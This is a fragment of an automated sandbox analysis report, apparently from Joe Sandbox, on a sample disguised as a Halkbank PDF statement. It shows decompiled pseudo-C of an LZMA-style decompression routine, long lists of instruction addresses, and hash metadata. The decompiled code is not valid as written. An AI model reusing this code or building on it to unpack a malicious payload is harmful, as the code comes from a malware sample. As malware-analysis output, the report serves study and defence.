													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                          0x00000000
                                          0x00407395
                                          0x00407395
                                          0x00407399
                                          0x004073be
                                          0x004073c8
                                          0x00000000
                                          0x0040739b
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a8
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00407489
                                          0x00407489
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00407447
                                          0x00406be3
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00000000
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x00000000
                                          0x004075cf
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00407441
                                          0x00407441
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x00000000
                                          0x00406dec
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00406dc8
                                          0x00000000
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x00000000
                                          0x00000000
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x00000000
                                          0x00407137
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00000000
                                          0x00407482
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x00000000
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x004075e5
                                          0x004075eb
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x004075fd
                                          0x00407601
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00407447
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00407524
                                          0x00000000
                                          0x00407399

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                          • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                          • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                          • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
